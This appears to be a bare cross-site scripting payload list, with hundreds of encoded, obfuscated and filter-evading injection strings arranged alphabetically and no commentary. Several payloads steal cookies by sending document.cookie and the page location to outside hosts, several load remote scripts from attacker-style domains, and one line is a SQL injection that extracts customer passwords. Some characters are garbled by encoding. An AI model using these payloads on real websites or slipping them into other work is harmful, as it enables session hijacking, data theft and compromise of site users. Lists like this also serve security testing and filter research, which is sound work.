- <%%%>
- >”’
- ![] + []
- ?=!?,?=!?,?=!+?,?=?+?
- ?=?[?[+?]+?[+?+[+?]]+?[?]+?[+?]+?[?]+?]
- ?=?[?]+?,?=?+?,?=?+?,?=+?,?=+?,?=?[?],?=?+[?]
- ?=?+?;?=?+?,?=?+?;?=[?]+?[?],?=?[+?]
- ?=[],?={}
- ?[?[?]+?[?]+?[?]+?[?]+?+?+?[?]+?[?]+?
- ?]=[!!?]+!?+?.?)[?+=?+?+?+?+?+?+
- ?+?+?+?][?](?+?+?+?+?+’(-~?)’)()
- /?#&;:=”%<>@[\\]^`{|}
- /*-/*`/*\`/*’/*”/**/
- ‘>//\\,<’>”>”>”*”
- ‘“(){}[];
- ”><! —
- ([,?,,,,?]=””+{},[??,??,??,??,,???,???,???,,,???]=[!!?]+!?+?.?)[?+=?+???+???+??+??+??+?+??+?+??][?](???+???+??+
- ([,?,,,,?]=[]+{},[?,?,?,?,,?,?,?,,,?]=[!!?]+!?+?.?)[?=?+?+?+?+?+?+?+?+?+?+?][?](?+?+?+?+?+’(-~?)’)()
- ([,?,,,,?]=[]+{},[?,?,?,?,,?,?,?,,,?]=[!!?]+!?+?.?)[?+=?+?+?+?+?+?+?+?+?+?][?](?+?+?+?+?+’(-~?)’)()
- ([,?,,,,?]=[]+{},[?,?,?,?,,?,?,?,,,
- ($=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!’’+$)[_/_]+$_[+$])])()[__[_/_]+__[_+~$]+$_[_]+$$](_/_)
- ($=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!’’
- )[?]+[?]+(?+?)[?])()
- +?[?]+?](?[?]+?[?]+?[?]+?+?+(?+?
- +$)[_/_]+$_[+$])])()[__[_/_]+__[_+~$]+$_[_]+$$](_/_)
- (!![]+[])[0]
- %00%00%00%00%00%00%00<script>alert(11)</script>
- %00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
- 00000000: 3c73 7667 0c6f 6e6c 6f61 640c 3d0c 616c <svg.onload.=.al
- 00000010: 6572 7428 3129 0c3e 0a ert(1).>.
- <
- <
- >
- >
- 00000`${alert(1)}`
- #0000108ert('XSS')>
- <
- <
- >
- >
- %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
- <
- <
- >
- >
- %00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E%00
- <
- <
- >
- >
- 0%0d%0a%00<script src=//h4k.in>
- �</form><input type=”date” onfocus=”alert(1)”>
- �</form><input type=”date” onfocus=”confirm(1)”>
- <[00]script>alert(1)</[00]script>
- %00"><script>alert(1)</script>
- <%00/title>
- 0\%22))}catch(e){confirm(2)}//
- <
- <
- >
- >
- “})}%0A%09%09alert(197);%0A{({“”:”&
- %’});%0aalert(1);%20//
- %0aalert(1);/><script>///
- %0aalert(1);/”><script>///
- %0Aonload=”eval(name)”;>
- <%0ascript>alert(1);</script>
- %0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e’; “></svg>
- 0\”autofocus/onfocus=alert(1) →<video/poster/ error=prompt(2)>”-confirm(3)-”
- 0\”autofocus/onfocus=alert(1) →<video/poster/onerror=prompt(2)>”-confirm(3)-”
- <%0bscript>alert(1);</script>
- {?????????????????????????????=0;?????????????????????????????()}catch(e){alert(e)}
- (0)[‘constructor’][‘constructor’](“\141\154\145\162\164(1)”)();
- 0..constructor.constructor`alert(1)```
- <%0Cscript>alert(1);</script>
- //%0D%0A%0d%0a//
- ;//%0da=eval;b=alert;a(b(10));//
- ‘;//%0da=eval;b=alert;a(b(9));//
- %0da=eval;b=alert;a(b(/d/.source));
- <! — */!’*/!>%0D<svg/onload=confirm`1`// —
- <! — */!’*/!>%0D<svg/onload=confirm`1`//
- (0)”></img>
- 0=”>”<img src=’-alert(1)-’ onerror=”;alert(179);”>
- 0&q=’;alert(String.fromCharCode(88,83,83))//\’;alert%2?8String.fromCharCode(88,83,83))//”;alert(String.fromCharCode?(88,83,83))//\”;alert(String.fromCharCode(88,83,83)%?29// →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search
- 0?<script>Worker(“#”).onmessage=function(_)eval(_.data)</script> :postMessage(importScripts(‘data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk’))
- ({$:#0=t,z:eval(String(#0#).replace(/@/g,))}).z//>
- \”><0x000123>
- [0x00][0x00][0x00][0x00][0x00][0x00][0x00]<script>alert(12)</script>
- [0x00][0x00][0x00][0x00][0x00][0x00][0x00]<script>alert(1)</script>
- [0x09,0x0B,0x0C,0x20,0x3B]
- [[0xc0]u003cimg src=1 onerror=alert(/xss/) [0xc0]u003e
- [0xc0]u003cimg src=1 onerror=alert(/xss/) [0xc0]u003e
- ( ![] + [] )[1]
- (!![]+[])[1] +
- (![]+[])[1] +
- //[10,13,8232(utf-8),8233(utf-8)]alert(1)//
- javascript:confirm(1)
- (!![]+[])[1] + (!![]+[])[0]])(9)
- 11111';\u006F\u006E\u0065rror=\u0063onfirm; throw’1
- (1?(1?{a:1?””[1?”ev\a\l”:0](1?”\a\lert”:0):0}:0).a:0)[1?”\c\a\l\l”:0](content,1?”x\s\s”:0)
- {1+1,confirm(8)}
- 1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
- //1234567890123/0/?0=”>”<img src=’-alert(51)-’ onerror=”;alert(510);”>
- 123%81";alert(1);//
- 123[‘’+<_>ev</_>+<_>al</_>](‘’+<_>aler</_>+<_>t</_>+<_>(1)</_>);
- 12&<script>alert(123)</script>=123
- 1337in alert(1)
- 1337in?alert(1)
- <blink/ onmouseover=prompt(1)>OnMouseOver
- <blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
- (‘\141\154\145\162\164\50\61\51’)()
- ({})[$=’\143\157\156\163\164\162\165\143\164\157\162'][$](‘\141\154\145\162\164\50/ @0x6D6172696F /\51’)()
- ({})[$=’\143\157\156\163\164\162\165\143\164\157\162'][$](‘\141\154\145\162\164\50/ 12345 /\51’)()
- [][‘\146\151\154\164\145\162’][‘\143\157\156\163\164\162\165\143\164\157\162’]
- 14.rs/#alert(document.domain)
- \152\141\166\141\163\143\162\151\160\164\072alert(1)
- 1};a=eval;b=alert;a(b(14));//
- 1];a=eval;b=alert;a(b(17));//
- 1;a=eval;b=alert;a(b(/c/.source));
- 1<a href=”data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
- 1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
- 1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
- 1…&alert(document.cookie)
- 1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(1)>>
- 1,class extends[]/alert(1){}
- 1<comment onresize=alert(1) contenteditable>1
- 1/confirm(1)
- “1\”&confirm(1)\”3"
- ___=1?’ert(123)’:0,_=1?’al’:0,__=1?’ev’:0,1[__+_](_+___)
- [1].find(alert)
- 1script3document.vulnerable=true;1/script3
- 1" →</script><svg/onload=’;alert(0);’>
- 1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(1)>`>
- /1/[Symbol.replace](‘1’,alert)
- ~~)1(trela+tpircsavaj’.split(‘’).reverse().join(‘’).split(‘~’).join(String.fromCharCode(47)).split(‘+’).join(String.fromCharCode(58))).concat(‘
- 1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>
- (![]+[])[2] +
- >%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22>
- >%22%27><img%20src%3d%22javascript:confirm(%27%20XSS%27)%22>’%uff1cscript%uff1econfirm(‘XSS’)%uff1c/script%uff1e’”>>”’’;! — “<XSS>=&{()}
- \%22}%29%29%29}catch%28e%29{confirm%28document.domain%29;}//
- %22%3B%3E%3Cscript%3Ealert(String.fromCharCode(73,69,82,82,69%3B%3C%2Fscript%3E
- %22/%3E%3CBODY%20onload=��document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)��%3E
- %22/%3E%3CBODY%20onload=document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)%3E
- %22/%3E%3CBODY%20onload=idocument.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)i%3E
- %22%3E%3Cimg%20src=k%20onerror=alert%28%22XSS%22%29%20/%3E
- %22%3E%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
- %22%3E%3Cscript%3Ealert%28/atul/%29%3C/script%3E
- %22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E
- %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
- %22%3e%3cscript%3ealert(‘XSS’)%3c/script%3e
- %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
- %22 — %3E%3C/style%3E%3C/script%3E%3Cscript%3E0x94(0x000123)%3C
- ‘%22 — %3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E
- ‘%22 — %3E%3C/style%3E%3C/script%3E%3Cscript%3Exss(0x000045)%3C/script%3E
- %22;alert%28%27RVRSH3LL_XSS%29//
- \%22))}catch(e){}if(!self.a)self.a=!confirm(document.cookie)//
- \%22;confirm(1);//
- 24185.43339120701.toString(36);
- 24185.43339120701.toString(36); (7.585899999991459e-10).toString(33).match(/[a-z]+/g)[0];
- %2522%253E%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E
- %2522%253E%253Csvg%2520onload%3D%2522confirm(7)%2522%253E
- %2527%257Calert%2528%2527XSS%2527%2529%257C%2527
- %253Cs%26%2399%3Bri%26%23112%3Bt%2520s%26%23114%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%253E
- %253Cs%26%23x63%3Bri%26%23x70%3Bt%2520s%26%23x72%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%23x63%3B%26%23x72%3Bi%26%23x70%3Bt%253E
- %253Cscript%2520src%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fscript%253E
- %253cscript%253ealert(1)%253c/script%253e
- %253Cscript%253Ealert(1)%253C/script%253E
- %253cscript%253ealert(document.cookie)%253c/script%253e
- %253Cscript%253Ealert(‘XSS’)%253C%252Fscript%253E
- %253Cscript%253Eprompt%28%29%253C%2Fscript%253E
- %253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E
- %253script%253ealert(/Xss/)%253c/script%253e
- %253script%253ealert(/Xss-By-Muhaddi/)%253c/script%253e
- “%25prompt(9)%25”
- %26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341
- & => %26 , # => %23 , + => %2B
- %26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);//
- %26%2397;lert(1)
- %26%23x003c%3Bimg%20src%3D1%20onerror%3Dalert(1)%26%23x003e%3B%0A
- ‘%26%26’javascript:alert%25281%2529//
- “%26%26prompt(9)%26%26”
- %26jsonp=alert(1);></script>
- %26lt%3bscript>
- %26p=%26lt;svg/onload=alert(1)><j onclick=location%2B=document.body.textContent>click me!
- “%26prompt(9)%26”
- %27%22 — %3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E
- <!%27/!”/!\%27/\”/ — !><Input/Type=Text%20AutoFocus%20*/;%20OnFocus=(confirm)(1)%20//>
- %27%3C/script%3E%3Cscript%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/script%3E/
- %27|alert%28%27XSS%27%29|%27
- %2BACIAPgA8-script%2BAD4-alert%28/1/%29%2BADw-%2Fscript%2BAD4APAAi-&oe=Windows-31J
- %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
- %2BADw-script%2BAD4-alert%281%29%2BADw-/script%2BAD4-
- %2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
- ‘%2Balert(0x000123)%2B’
- %2Balert(0x000123)%2B’
- %2B/rt/.source%2Blocation.hash[1]%2B1%2Blocation.hash[2]>#()
- 2IoL0x5OWljblYwWld4dloybGpMbU52YlM1aWNpOHkvLnNv
- ❤ </3
- "><h1/onmouseover=’\u0061lert(1)’>
- "><h1/onmouseover=’\u0061lert(1)’>%00
- "><svg><style>{-o-link-source:’<body/onload=confirm(1)>’
- 'XSS')>
- /*',/**/eval(name)/*%2A///*///);width:100%;height:100%;position:absolute;-msbehavior:url(#default#time2)
- %3C
- %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e
- %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%78%73%73%22%29%3b%3c%2f%73%63%72%69%70%74%3e
- %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
- %3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cs%26%2399%3Bri%26%23112%3Bt%2520s%26%23114%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E
- %3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cs%26%23x63%3Bri%26%23x70%3Bt%2520s%26%23x72%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%23x63%3B%26%23x72%3Bi%26%23x70%3Bt%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E
- %3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cscript%2520src%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fscript%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E
- =”/>%3ciframe%20src%3djavascript%3aalert%283%29%3e
- “/>%3ciframe%20src%3djavascript%3aalert%283%29%3e
- ‘%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
- %3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E
- <%3C<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\x3c\x3C\u003c\u003C
- %3Cs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%20s%26%23114%3B%26%2399%3B%3Dht%26%23116%3Bp%3A%2F%2Fx%26%23116%3Bxs%26%2399%3B.cx%2Fxss%2Ejs%3E%3C%2Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%3E
- %3Cs%26%2399%3Bri%26%23112%3Bt%20s%26%23114%3Bc%3D%2F%2Fxy%2Ehn%2Fa%2Ejs%20%3E%3C%2Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%3E
- %3Cs%26%23x63%3Bri%26%23x70%3Bt%20s%26%23x72%3Bc%3D%2F%2Fxy%2Ehn%2Fa%2Ejs%20%3E%3C%2Fs%26%23x63%3B%26%23x72%3Bi%26%23x70%3Bt%3E
- %3Cs%26%23x63%3Bri%26%23x70%3Bt%20s%26%23x72%3Bc%3Dhttp%3A%2F%2Fxs%26%23s63%3B.cx%2Fxss%2Ejs%3E%3C%2Fs%26%23x63%3Bri%26%23x70%3Bt%3E
- %3Cscript%0Baaa%3Ealert%281%29%3C/script%0Baaaa%3E
- %3Cscript%0Baaa%3Ealert%281%29%3C/script%3E
- %3Cscript%0Caaaaa%3Ealert%28123%29%3C/script%0Caaaaa%3E
- %3Cscript%20src=/xss.js%3E%3C/script%3E%3Cbase%20href=//evil/
- 3Cscript%3Ealert(1)%3C%2Fscript%3E
- %3Cscript%3Ealert(1)%3C/script%00TESTTEST%3E
- %3Cscript%3Ealert(1)%3C/script%3E
- %3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
- %3cscript%3ealert(document.cookie);%3c%2fscript%3e
- %3Cscript%3Ealert(document. domain);%3C/script%3E&
- %3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
- %3cscript%3ealert(“WXSS”);%3c/script%3e
- %3cscript%3ealert(‘XSS’)%3c/script%3e
- %3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E
- %3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{confirm%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E
- %3Cx onerror=prompt(131)
- %3Cx onxxx=alert(1)
- %3Cx onxxx=alert(1)
- %3E
- %3E%3Cbody%20onload=javascript:alert(1)%3E
- %3E%3Cbody%20onload=javascript:alert(1)# var sc=escape(document.cookie);var d=escape(document.location);var mI=new Image();mI.src="http://host?a="+d+"&b="+ sc;
- (![]+[])[4] +
- [4076*A]<img src=”x” alt=”[0x8F]” test=” onerror=confirm(1)//”>
- ‘’;!--”<NeatHtmlReplace_XSS>=&{()}
- 500);alert(1);//
- 5.replace(/XSS/g,confirm)
- 5yZXNwb25zZVRleHQpWzFdKycmbmV3Y29udGVudD08Pz1gJF9HRV
- <
- <
- >
- >
- <%/%=%><p/onresize=alert(1)//>
- 62<svg onload=alert(62)>
- <%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = ‘(%2e%2a%3f)’%22)[%31]); </%73%63%72%69%70%74>
- \74svg o\156load=alert\5061\51>
- (7.585899999991459e-10).toString(33).match(/[a-z]+/g)[0];
- <%78 onerror=prompt(132)
- <%78 onxxx=1
- <%78 onxxx=1
- [84].find(alert)
- 9TVCcscCtmLDEpDQp4LnNldFJlcXVlc3RIZWFkZXIoJ0NvbnRlbnQtVHl
- <a
- a=`
- <a”’%0A`= +%20>;test<a”’%0A`= +%20>?test<a”’%0A`= +%20>;#test<a”’%0A`= +%20>;
- <a”’%0A`= +%20>;test<a”’%0A`= +%20>?test<a”’%0A`= +%20>;&x=”><img src=x onerror=prompt(1);>#”><img src=x onerror=prompt(1);>test<a”’%0A`= +%20>;
- a=0||’ev’+’al’||0;b=0||’locatio’;b+=0||’n.h’+’ash.sub’||0;b+=0||’str(1)’;c=b[a];c(c(b))
- a=0||’ev’+’al’,b=0||location.hash,c=0||’sub’+’str’,1[a](b[c](1))
- “a”+(0,”l”)+”ert(1)”
- a=1;a=eval;b=alert;a(b(11));//
- a=%1B$*H%1BN&b=%20type=image%20src=x%20onerror=alert(document.c haracterSet);//
- a%20onchange=alert(9)>
- <a href=[�]”� onmouseover=prompt(1)//”>XYZ</a
- a=a%3D&b=+><img+src%3Da+onerror%3Dalert(9)//
- <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
- <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
- <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
- <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
- a=<a><b>%3c%69%6d%67%2f%73%72%63%3d%31%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%31%29%3e</b></a>document.write(unescape(a..b))
- {{a=”a”[“constructor”].prototype;a.charAt=a.trim;$eval(‘a”,alert(alert=1),”’)}}
- =a?a?><img/src=a?xa?onerror=eval(String.fromCharCode(119,105,110,100,111,119,46,108,111,99,97,108,83,116,111,114,97,103,101,46,115,101,116,73,116,101,109,40,39,105,100,39,44,39,34,62,60,105,109,103,47,115,114,99,61,92,34,120,92,34,111,110,101,114,114,111,114,61,97,108,101,114,116,40,49,41,62,39,41))>
- a=`${alert/*}`;
- a=`${alert`1`}`
- a;alert(1);//
- a=alert a(0)
- a=alert,a(1)
- A=alert;A(1)
- a=alert,a(83)
- a?aMaXscriptaMconfirm(1)aX/scriptaM
- “;a.b=c;//
- “;a[b]=c;//
- ‘abc(def)ghi(jkl)mno(pqr)abc(def)ghi ‘
- “‘`>ABC<div style=”font-family:’foo’*chr*x:expression(log(*num*));/*’;”>DEF
- “‘`>ABC<div style=”font-family:’foo*chr*;x:expression(log(*num*));/*’;”>DEF
- “‘`>ABC<div style=”font-family:’foo’\x3Bx:expression(javascript:alert(1);/*’;”>DEF
- “‘`>ABC<div style=”font-family:’foo’\x3Bx:expression(javascript:alert(1);/*’;”>DEF
- “‘`>ABC<div style=”font-family:’foo’\x7Dx:expression(javascript:alert(1);/*’;”>DEF
- “‘`>ABC<div style=”font-family:’foo’\x7Dx:expression(javascript:alert(1);/*’;”>DEF
- ABC<div style=”x:expression\x00(javascript:alert(1)”>DEF
- ABC<div style=”x:expression\x5C(javascript:alert(1)”>DEF
- ABC<div style=”x:exp\x00ression(javascript:alert(1)”>DEF
- ABC<div style=”x:exp\x5Cression(javascript:alert(1)”>DEF
- ABC<div style=”x:\x00expression(javascript:alert(1)”>DEF
- ABC<div style=”x:\x09expression(javascript:alert(1)”>DEF
- ABC<div style=”x:\x0Aexpression(javascript:alert(1)”>DEF
- ABC<div style=”x:\x0Bexpression(javascript:alert(1)”>DEF
- ABC<div style=”x:\x0Cexpression(javascript:alert(1)”>DEF
- ABC<div style=”x:\x0Dexpression(javascript:alert(1)”>DEF
- ABC<div style=”x:\x20expression(javascript:alert(1)”>DEF
- ABC<div style=”x\x3Aexpression(javascript:alert(1)”>DEF
- ABC<div style=”x:\xC2\xA0expression(javascript:alert(1)”>DEF
- ABC<div style=”x:\xE2\x80\x80expression(javascript:alert(1)”>DEF
- ABC<div style=”x:\xE2\x80\x81expression(javascript:alert(1)”>DEF
- ABC<div style=”x:\xE2\x80\x82expression(javascript:alert(1)”>DEF
- ABC<div style=”x:\xE2\x80\x83expression(javascript:alert(1)”>DEF
- ABC<div style=”x:\xE2\x80\x84expression(javascript:alert(1)”>DEF
- ABC<div style=”x:\xE2\x80\x85expression(javascript:alert(1)”>DEF
- ABC<div style=”x:\xE2\x80\x86expression(javascript:alert(1)”>DEF
- ABC<div style=”x:\xE2\x80\x87expression(javascript:alert(1)”>DEF
- ABC<div style=”x:\xE2\x80\x88expression(javascript:alert(1)”>DEF
- ABC<div style=”x:\xE2\x80\x89expression(javascript:alert(1)”>DEF
- ABC<div style=”x:\xE2\x80\x8Aexpression(javascript:alert(1)”>DEF
- ABC<div style=”x:\xE2\x80\x8Bexpression(javascript:alert(1)”>DEF
- ABC<div style=”x:\xE3\x80\x80expression(javascript:alert(1)”>DEF
- ABC<div style=”x:\xEF\xBB\xBFexpression(javascript:alert(1)”>DEF
- a{b:`function(){alert(1)}()`;}
- <AboutBoxText><![CDATA[<a href=javascript:alert(1337)>Click me</a>]]> </AboutBoxText>
- about://xss.cx
- accesskey=x onclick=alert(1) 1=
- “ accesskey=x onclick=alert(1) 1=’
- +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
- a. click()
- {{a=’constructor’;b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,’alert(1)’)()}}
- {{‘a’.constructor.prototype.charAt=[].join;$eval(‘x=1} } };alert(1)//’);}}
- {{‘a’.constructor.prototype.charAt=[].join;$eval(‘x=1}}};alert(1)//’);}}
- {{‘a’.constructor.prototype.charAt=[].join;$eval(‘x=alert(1)’);}}
- {{‘a’.constructor.prototype.charAt=’’.valueOf;$eval(“x=’\”+(y=’if(!window\\u002ex)alert(window\\u002ex=1)’)+eval(y)+\”’”);}}
- <A?cript/async/src=//a?a?L>
- action=//localhost/self/login.php?returnURL=changemail.php>
- <a data-remote=true data-method=delete href=/delete_account>CLICK</a>
- a=document.createElement(‘a’)
- +ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);
- +ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-
- +ADw-SCRIPT+AD4-alert(1);+ADw-/SCRIPT+AD4-
- +ADw-script+AD4-alert(+ACI-XSS+ACI-)+ADw-/script+AD4-
- +ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
- };a=eval;b=alert;a(b(12));//
- ‘};a=eval;b=alert;a(b(13));//
- ‘];a=eval;b=alert;a(b(15));//
- ];a=eval;b=alert;a(b(16));//
- */a=eval;b=alert;a(b(/e/.source));/*
- a=/ev/ .source a+=/al/ .source,a = a[a] a(name)
- a=/ev/// .source a+=/al/// .source a[a] (name)
- “><a fooooooooooooooooooooooooooooooooo href=JaVAScript%26colon%3Bprompt%26lpar%3B1%26rpar%3B%>
- <!a foo=x=`y><img alt=”`><img src=xx:x onerror=alert(2)//”>
- <?a foo=x=`y><img alt=”`><img src=xx:x onerror=alert(3)//”>
- a=function(){},(p=>p.c=()=>alert(‘d’))(a.prototype),b=new a,b.c()
- a=”get”;
- a=\”get\”;
- a=”;get”;;&;#10;b=”;URL(“;”;;&;#10;c=”;javascript:”;;&;#10;d=”;alert(‘;XSS’;);”;)”;; eval(a+b+c+d);
- a=”get”; b=”URL(“”; c=”javascript:”; d=”alert(‘XSS’);”)”;eval(a+b+c+d);
- a=”get”;b=”URL”;c=”javascript:”;d=”alert(1);”;eval(a+b+c+d);
- a=”get”;b=”URL”;c=”javascript:”;d=”alert(‘X10SS’);”;eval(a+b+c+d);
- a=”get”;b=”URL”;c=”javascript:”;d=”alert(‘xss’);”;eval(a?);
- a=”get”;b=”URL”;c=”javascript:”;d=”alert(‘xss’);”;eval(a+b+c+d);
- a=”get”; b=”URL(\””; c=”javascript:”; d=”alert(‘XSS’);\”)”; eval(a+b+c+d);
- a=”get”;b=”URL(\””;c=”javascript:”;d=”alert(‘XSS’);\”)”;eval(a+b+c+d);
- a=”get”;b=”URL(ja\””;c=”vascr”;d=”ipt:ale”;e=”rt(‘XSS’);\”)”;eval(a+b+c+d+e);
- <% a=%><iframe/onload=alert(1)//>
- aHAnDQp4Lm9wZW4oJ0dFVCcscCtmLDApDQp4LnNlbmQoKQ0KJD0n
